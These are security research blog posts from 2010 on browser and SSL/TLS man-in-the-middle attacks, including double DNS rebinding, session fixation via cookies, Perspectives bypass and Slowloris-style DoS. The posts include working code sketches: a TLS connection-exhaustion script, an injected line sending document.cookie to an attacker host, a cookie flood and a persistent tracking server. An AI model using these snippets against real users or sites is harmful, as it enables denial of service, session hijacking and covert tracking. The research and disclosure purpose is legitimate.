web application security lab

Throttling Traffic Using CSS + Chunked Encoding

September 1st, 2010

19 posts left…

So Pyloris doesn't work particularly well for port exhaustion on the server, but what if we can exhaust the connections on the client to better meter out traffic? If it worked, that would make it easier for a MITM to see each individual request. So I started down a rather complicated path of using a mess load of link tags on an HTTP website, trying to affect the connections on the HTTPS version of the same domain. No joy. It turns out that the limits placed on one port don't affect what happens on another (at least in Firefox). So while I can exhaust all the connections to a domain over a single port, I can't do anything using HTTPS - or so it seemed (unless I was willing to muddy the water further by sending a bunch of requests that I knew were a certain size to the HTTPS site - which just seemed more painful than helpful).

Then, based on some earlier research, I stormed into id's office and started bitching that there was no point in trying to stop port exhaustion if browsers were going to allow tons of connections anyway, just spread across separate sockets to different hosts. As the words came out of my mouth I realized I had come up with the answer - a ton of webservers. I guessed that there must be some upper bound of outbound connections, probably at or below 130. You should have seen id's face as I asked him to set up 130 connections / 6 connections per server = 22 web-servers for me. Hahah… I thought he'd kill me.

It turns out it's nowhere near 130 open connections. Firefox sets a rather arbitrary 30 connection limit. So if you can create 5 open web-servers, exhaust all 30 connections, and only free one up long enough to allow the victim to download one request at a time, I think we're in business. Makes sense in theory. The problem is that it's REALLY slow. I mean… painful. In my testing it seemed more like the server was broken entirely from the victim's perspective. But eventually… and in some cases I mean minutes later - it would load. I'm sure the attack could be optimized to key off the fact that no more packets are being sent once the image gets downloaded or whatever… which would signal the program to free up a connection. That's as opposed to the crapola time-based solution I came up with for testing, combined with chunked encoding to force the connections to stay open without downloading anything. So I bet this attack could work if someone put some tender loving care into it, but it was kind of a huge waste of time for me personally - and for poor id.
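
For the curious, the hold-open trick boils down to something like this (a rough Node.js sketch purely for illustration, not my actual test code - the port and timing are arbitrary):

// One of the hold-open servers: never finish the response, so the browser
// keeps the connection (and one of its 6-per-host slots) tied up.
var http = require('http');

http.createServer(function (req, res) {
  // No Content-Length, so Node sends Transfer-Encoding: chunked automatically.
  res.writeHead(200, { 'Content-Type': 'text/plain' });
  // Dribble out a tiny chunk every 10 seconds and never call res.end().
  setInterval(function () { res.write('x'); }, 10000);
}).listen(8001);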

Incidentally, for those who have never seen or met id and would like to know a little about the other side of webappsec that I don't talk about much here (the configuration, operating system and network), your chance is nearing. There's a rumor that he'll be speaking at Lascon in October. He'll be talking about how he's managed to secure ha.ckers.org for all these years despite how much of a target I've made it. :) Should be fun.

Pyloris and Metering Traffic

September 1st, 2010

20 posts left…

Pyloris is a Python version of Slowloris, and since it's written in Python its SSL version is thread safe. So what better way to lock up an SSL/TLS Apache install (given that Apache still hasn't fixed their DoS)? Well, one of the big problems attackers have when trying to decipher SSL/TLS traffic is the fact that browsers not only send a lot of requests down a single connection, they also keep a bunch of open connections over separate sockets. What if we could use Pyloris to exhaust all but one open socket?

Well, it turns out that while this sorta works, there are a lot of issues with the concept. Firstly, it requires Apache. Secondly, the server can't be using a load balancer (assuming the load balancer isn't running Apache itself). Thirdly, it requires that there are no other users on the system, or there will be a seriously annoying user experience for the poor victim who can't reach the site that the man in the middle is trying to decipher traffic from. Alas… So while this didn't work particularly well in my testing, I'm certain that with more thinking someone could figure out a way to do this.
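
The core of the Slowloris/Pyloris trick is just holding connections open by never finishing the request. Something like this rough sketch shows the idea (plain Node.js here, not Pyloris itself - the target host and connection count are made up):

// Slowloris-style sketch: open many TLS connections to the target and trickle
// header lines so Apache keeps its worker slots reserved and never times out.
var tls = require('tls');

var target = 'victim.example.com';   // hypothetical Apache SSL/TLS target
var connections = 200;               // a guess at enough to fill the worker pool

for (var i = 0; i < connections; i++) {
  (function () {
    var s = tls.connect(443, target, { rejectUnauthorized: false }, function () {
      // Start a request but never finish the headers.
      s.write('GET / HTTP/1.1\r\nHost: ' + target + '\r\n');
    });
    s.on('error', function () { /* ignore dropped sockets; real tools reconnect */ });
    // Every 10 seconds send another bogus header so the request never completes.
    setInterval(function () { s.write('X-a: b\r\n'); }, 10000);
  })();
}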

XSHM Mark 2

September 1st, 2010

21 posts left…

If you're familiar with XSHM this is going to look awfully similar (but better). When a script creates a new popup (or tab) it retains control over where to send it at a later date. I talked about this concept before. But let's see what else can be done. What if the attacker uses the history.length property to calculate how many pages a user has visited after they left the tab for wherever they landed? The attacker could do something like this:

a.location = 'data:text/html;utf-8,<script>alert(history.length);history.go(-1);<\/script>';

By setting either a recursive setTimeout or using some manual polling mechanism, the attacker can (in this case) cause a popup which monitors how many pages the victim has visited. Normally it wouldn't cause a popup; the attacker would redirect to another domain that they had access to, which would do the same history.length check. Voila. The user only sees a brief white flash and then the same page they were just on - as if nothing happened. They'd probably just think their browser is messing up again. This could be helpful in a number of esoteric situations where the number of pages visited may change, or where you want to force them through several flows (and back and forth again) all with a single mouse click - the click that gave you the authority to pop up in the first place. The best part is that this will follow them while they surf for as long as both windows stay open.
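
In sketch form, the polling side looks something like this (attacker.example.com, check.html and the 15 second interval are all made up for illustration):

// 'a' is the popup/tab we opened off the user's single click, so we still
// control where it goes. check.html reads history.length, reports it back to
// us, then calls history.go(-1) so the victim only sees a brief flash.
var a = window.open('http://victim.example.com/', 'mark');

function poll() {
  a.location = 'http://attacker.example.com/check.html';
  setTimeout(poll, 15000);   // recursive setTimeout keeps the monitoring going
}
setTimeout(poll, 15000);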

Cookie Clobbering

September 1st, 2010

22 posts left…

While thinking about the previous issue, listening to Jeremiah's preso and talking with the guys at Microsoft, I got to thinking about cookie clobbering. Let's say that Microsoft thinks HTTP cookies overwriting secure cookies is a big enough problem to fix. Let's walk through the use cases. Say there is a separate place for secure cookies that can't be overwritten by non-secure cookies. Does that mean two cookies are replayed in HTTPS space, or that the HTTPS cookie always wins? Okay… let's say it wins and the secure-flag cookie is the only one sent. Well, let's not forget about Jer's cookie clobbering script.

When an attacker forces overwriting of the cookie jar, they get the exact same effect. Now the victim has no cookies, secure or otherwise, if the global cookie jar stays the same size and it remains a LIFO system. So now you're saying, well, the attacker can just use an SSL/TLS enabled cookie clobbering script - you're right! So now there has to be a per-site container… or something - and doesn't that completely defeat the purpose of the upper limits on cookies anyway? Now DoS conditions become an issue, with the disk being filled by tons of huge cookies, and so on. Anyway… this probably needs a lot more thought, and I'm certainly not advocating "fixing" this just to end up with a worse situation than we already have. But certainly secure cookies shouldn't be clobbered by HTTP cookies - in my opinion.
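
For reference, the guts of a cookie clobbering script are just a loop that floods the per-domain jar until the real cookies fall out - roughly like this (the count of 200 is only a guess at being comfortably over the browser's per-domain limit):

// Flood the per-domain cookie jar so the browser evicts the site's real
// cookies, secure or not. 200 junk cookies is an assumed over-the-limit count.
for (var i = 0; i < 200; i++) {
  document.cookie = 'junk' + i + '=' + new Array(100).join('x') + '; path=/';
}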

MITM, SSL and Session Fixation

September 1st, 2010

23 posts left…

It’s been known for a long time that HTTP can set cookies that can be read in HTTPS space because cookies don’t follow the same origin policy in the way that JavaScript does. More importantly, HTTP cookies can overwrite HTTPS cookies, even if the cookies are marked as secure. I started thinking of a form of session fixation during our research that uses this to the attacker’s advantage. Let’s assume the attacker wants to get access to a user’s account that’s over SSL/TLS. Now let’s assume the website sets a session cookie prior to authentication and after authentication the site marks the cookie as valid for whatever username/password combo it receives.

First, the attacker goes to the website before the victim gets there so he can get a session cookie. Then, if the victim is still in HTTP for the same domain the attacker can set a cookie that will replay to the HTTPS website. So the attacker sets the same cookie that he just received into the victim’s browser. Once the victim authenticates, the cookie that the attacker gave the victim (and knows) is now valid for the victim’s account. Now if the victim was already authenticated or had already gotten a session token, no big deal. The attacker overwrites the cookie, which at worst logs the user out. Once the victim re-authenticates, voila - session fixation. Now all the attacker has to do is replay the same cookie in his own browser and he’s in the user’s account.
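
The fixation step itself is tiny - the MITM just injects something along these lines into any plain-HTTP page on the domain (the cookie name, value and domain here are hypothetical):

// Injected by the MITM into an HTTP page on the target domain. SESSIONID and
// its value stand in for whatever pre-auth session token the attacker just
// obtained for himself; it will replay to the HTTPS site.
document.cookie = 'SESSIONID=attacker_known_value; domain=.example.com; path=/';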

Issues with Perspectives

September 1st, 2010

24 posts left…

When I told one of my guys about the double DNS rebinding attack, he said, "Well it's a good thing I use Perspectives." So that was my clue that I had better get familiar with the plugin if people are seriously relying on it for security. In the process we found a number of potential issues. For those of you who aren't super clued in about this tool, it was originally designed to handle situations where governments are tapping people using things like Packet Forensics gear, where a valid certificate authority is being used to man in the middle someone or a group of individuals.

First of all, it's easy for a man in the middle to detect Perspectives. Perspectives sends a lot of HTTP traffic, which the attacker can easily read and figure out is related to Perspectives. That may not seem important - if an attacker knows that a user has it installed, what can they really do? We'll come back to this.

Embedded content is not verified by Perspectives, only the parent window. Because most websites (even HTTPS ones) use third party service providers, caching servers or whatever for static content, the attacker can simply MitM the "static" servers serving up CSS, JavaScript or objects that become dynamic content once rendered. By modifying the response and including active content, anything that can be seen by the DOM is still accessible to the man in the middle. Kinda defeats the purpose of Perspectives…
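
For example, the MitM can tack a line like this onto any "static" JavaScript file the HTTPS page pulls in, and Perspectives never looks at it (attacker.example.com is made up):

// Appended by the MitM to a "static" .js file included by the HTTPS page.
// Anything the DOM can see - including document.cookie if it isn't HTTPOnly -
// leaks out to a host the attacker controls.
new Image().src = 'http://attacker.example.com/steal?c=' +
  encodeURIComponent(document.cookie) + '&u=' + encodeURIComponent(location.href);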

Using the fact that the attacker knows someone is running Perspectives (which they can determine by forcing them through an SSL/TLS link), the attacker can simply MITM only the embedded content. Of course there are changes a user can make to the settings and options to reduce this risk, but like all options, they're probably not changed often and the defaults really aren't good.

Lastly, I tried Perspectives against the double DNS rebinding issue. Unfortunately, because the attack uses a valid cert from a nearby sub-domain that Perspectives has probably seen before, instead of the huge pop-down that would actually alert someone to the problem it only gives the small warning that most people probably wouldn't notice unless they were really paying attention.

Prior Knowledge Of User’s Cert Warning Behavior

September 1st, 2010

25 posts left…

One of the issues Josh and I talked about at Blackhat was how the SSL certificate warning message can be used to gain information about a user's behavior, and how that can be used against the user. Let's say a man in the middle causes an error by proxying a well-known owner/subsidiary - for example https://www.youtube.com/, which most technical people know belongs to Google and which, incidentally, causes SSL/TLS mismatch errors because it's mis-configured. Experts who see such an error and investigate will think it's just a dumb (innocent) error. Non-experts will click through immediately, because they always do when they see such things.

By measuring the wait time, the attacker can know which type of user the victim is - a technical one or a novice. If the user is a novice, the attacker knows they don't have to worry anymore - they can deliver their snake oil cert later, because a user who clicks through "quickly" will most likely keep behaving that way. Of course figuring out the timing might be a bit tricky, because really new users will be awfully confused by cert warnings and will seem "slow", I'd bet. Anyway, something to investigate further.
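
In practice the measurement would live inside the MITM proxy itself, but the timing idea boils down to something like this rough standalone sketch (Node.js, with placeholder snake oil key/cert files):

// Estimate how long a user stares at the cert warning: time the gap between
// the first raw TCP connection (warning about to be shown) and the first
// request that arrives over a completed handshake (user clicked through).
var fs = require('fs');
var tls = require('tls');

var firstAttempt = null;
var reported = false;

var server = tls.createServer({
  key: fs.readFileSync('snakeoil-key.pem'),    // placeholder self-signed key
  cert: fs.readFileSync('snakeoil-cert.pem')   // placeholder self-signed cert
}, function (stream) {
  // A request only shows up after the user has accepted the warning.
  stream.once('data', function () {
    if (firstAttempt !== null && !reported) {
      reported = true;
      console.log('Clicked through after ~' + (Date.now() - firstAttempt) + ' ms');
    }
    stream.end('HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\nok');
  });
});

// The raw TCP connection fires before the TLS handshake, i.e. right when the
// browser is about to complain about the cert.
server.on('connection', function () {
  if (firstAttempt === null) firstAttempt = Date.now();
});

server.listen(443);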

IE Cookies

August 27th, 2010

26 posts left…

The fact that IE8 doesn't delete cookies when you tell it to (at least in my testing) until the browser shuts down isn't just bad for usability (and ho boy is it annoying when you're testing) - it has other interesting privacy implications too. Generally I tell people not to set the same cookie more than once. That makes it harder to use old XMLHttpRequest bugs to download the cookie (which may otherwise be protected using HTTPOnly). But what if the cookie weren't sensitive, but rather used for tracking?

If a site sets a unique cookie and the user clears cookies in IE8, IE8 keeps sending the cookie anyway (it's retained in memory) - which means the site still gets it. If the site is trying to track the user, it can simply keep setting the exact same HTTP cookie with an "expires" in the future to make it persist after the browser closes, and voila! Even though the user thinks they cleaned their cookies, not for a moment was the cookie removed in IE8. Could be useful for banner advertisers or companies that need to do large scale tracking of users.
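
Server-side, the tracking loop is trivial - just re-set the identical cookie with a far-future expiry on every response. A rough Node.js sketch (the cookie name, ID scheme and port are made up):

// Echo back whatever tracking ID the browser still sends (even "cleared"
// IE8 cookies keep coming from memory) and re-persist it with a far-future
// expires on every single response.
var http = require('http');

http.createServer(function (req, res) {
  var match = /track=([^;]+)/.exec(req.headers.cookie || '');
  var id = match ? match[1] : Math.random().toString(36).slice(2);  // reuse or mint an ID
  res.setHeader('Set-Cookie',
    'track=' + id + '; expires=Fri, 01 Jan 2020 00:00:00 GMT; path=/');
  res.end('hello');
}).listen(8002);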

MitM DNS Rebinding SSL/TLS Wildcards and XSS

August 22nd, 2010

27 posts left…

This was one of the more complex issues Josh Sokol and I talked about during our presentation at Blackhat. Let's say there's an SSL/TLS protected website (addons.mozilla.org) that an attacker knows the victim is using. The attacker is a MitM, but let's say that addons.mozilla.org has no security flaws in it whatsoever. Let's also say that there's another subdomain called mxr.mozilla.org that has the following attributes: it has no important information on it (otherwise the attacker would be content with attacking it instead), it's vulnerable to XSS, it doesn't care about host headers, and it uses a wildcard cert for *.mozilla.org. How can an attacker use that to their advantage?

The victim requests the IP for addons.mozilla.org, and the attacker rewrites the DNS response's TTL down to 1 second (and does the same for all subsequent DNS traffic for that domain). The victim logs into addons.mozilla.org (gets a cookie). Login detection can help determine that the user is authenticated, and it's important that the attack doesn't start before this, otherwise it will fail.
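
The login detection is the usual trick - probe a resource only an authenticated user can load and poll until it succeeds. A rough sketch (the image path and the startAttack() call are hypothetical):

// Try to load something only a logged-in user can fetch; poll until it works.
function check() {
  var probe = new Image();
  probe.onload  = function () { startAttack(); };              // logged in - begin the rebinding (hypothetical function)
  probe.onerror = function () { setTimeout(check, 30000); };   // not yet - poll again in 30 seconds
  probe.src = 'https://addons.mozilla.org/some/authenticated-only/image.png';  // hypothetical path
}
check();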

The attacker firewalls off the IP for addons.mozilla.org and forces the user to the XSS URL at:
https://addons.mozilla.org/mozilla-central/ident?i=a%20onmouseover%3Dalert('XSS')%20a (notice that the hostname is "wrong" - it should be mxr.mozilla.org, because that's where the XSS lives). Note that this WAS a real XSS in mxr, but it has been fixed, and to make it work it would require the user to mouse over it, so you'd have to do some clickjacking or something - but let's just pretend that all wasn't a problem, and/or that there was an easier XSS.

The victim requests the IP for addons.mozilla.org again, but this time the attacker responds to the DNS request (with a 1 second TTL) with the IP address of mxr.mozilla.org (not addons). The user connects to the mxr.mozilla.org IP address sending the wrong host header - the reason this works is that the wildcard SSL/TLS cert is valid for any mozilla.org subdomain and the mxr.mozilla.org website doesn't care about host headers. The victim runs the XSS in the context of addons.mozilla.org even though they're on the mxr.mozilla.org IP. That sounds bad (maybe useful for phishing), but there's worse the attacker can do.

The attacker could stop here if addons.mozilla.org didn't use HTTPOnly cookies, because the cookie could simply be stolen from JavaScript space. But let's assume that addons has no flaws in it, including how it sets cookies. In that case the attacker just rebinds again. For lack of a better term we called this "double DNS rebinding."

The attacker firewalls off the IP for mxr.mozilla.org and un-firewalls the addons.mozilla.org IP. The victim's browser re-binds and requests DNS for addons.mozilla.org again. The attacker delivers the real IP for addons.mozilla.org. The victim's cookie is sent to addons.mozilla.org and the JavaScript is now running in the context of addons.mozilla.org. The victim's browser runs a BeEF shell back to the attacker, which allows the attacker to see the contents of the user's account and interact as if they were the user.

We talked with a few people in various places about how likely this is, and although it worked on one of the two sites we checked, we think the likelihood that it will work on any given SSL/TLS enabled site is pretty low. The site has to use a wildcard cert, has to have HTTP response splitting/XSS, etc… and has to ignore the host header. We guesstimate that probably between 2-4% of SSL/TLS protected sites would be affected by this, although in reality there's not a lot of risk here because the attack has a lot of moving parts - there are certainly easier exploits out there. But the interesting part is that this is yet another reason all subdomains should be considered in scope when something sensitive is sitting behind authentication, beyond the obvious case of someone just breaking in and stealing the cert outright.

Incidentally, when I told the Mozilla guys about this, they said, "Why would we have checked for XSS in mxr? There's nothing important on there… It's all public information." followed by, "Well, it'll be fun checking for XSS on all our sub domains now." That's a good idea anyway because of phishing, but checking host headers is an easier short-cut in the short term. I wouldn't worry much about this attack, because it's unlikely, but it was interesting coming up with the use case.

Using Cookies For Selective DoS and State Detection

August 22nd, 2010

28 posts left….

This is a continuation of the first post, where we described how you can use cookies to DoS certain portions of a website. After our speech one of the Mozilla guys came up to us and described another attack that arises from this. Let's say that when a user logs in the site sets a cookie that is 200 bytes long, and when they log out it re-sets the same cookie at 50 bytes. Well, if the attacker can set a cookie scoped to the path of a single image on the site, for instance, they can use JavaScript with an onerror event handler to check whether the image has loaded.

By combining the site's cookie with an over-long attacker cookie (sized at roughly the server's header limit minus the 50-byte logged-out case), a logged-in state will cause the image to fail to load, whereas a logged-out state will allow the image to load just fine. In this way an attacker can tell cookie states apart as long as the cookies are variable width and there aren't other cookies muddying the waters. Interesting attack, I thought!
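
As a rough sketch (the header limit, sizes, paths and domain are all made up):

// Step 1 (run somewhere that can set cookies for the victim domain, e.g. the
// HTTP side of a MITM or an XSS on a sibling subdomain): pad the cookie jar
// with a path-scoped cookie sized so that only the logged-in (200 byte) cookie
// pushes the request headers over the server's limit.
var LIMIT = 8192;                              // assumed server header limit
var pad = new Array(LIMIT - 150).join('x');    // roughly limit minus the logged-out case
document.cookie = 'pad=' + pad + '; path=/img/logo.png; domain=.victim.example.com';

// Step 2 (run from the attacker's own page): probe the image and read the state.
var img = new Image();
img.onload  = function () { alert('logged out'); };   // 50 byte cookie - request fits under the limit
img.onerror = function () { alert('logged in'); };    // 200 byte cookie - headers too large, error page
img.src = 'https://victim.example.com/img/logo.png';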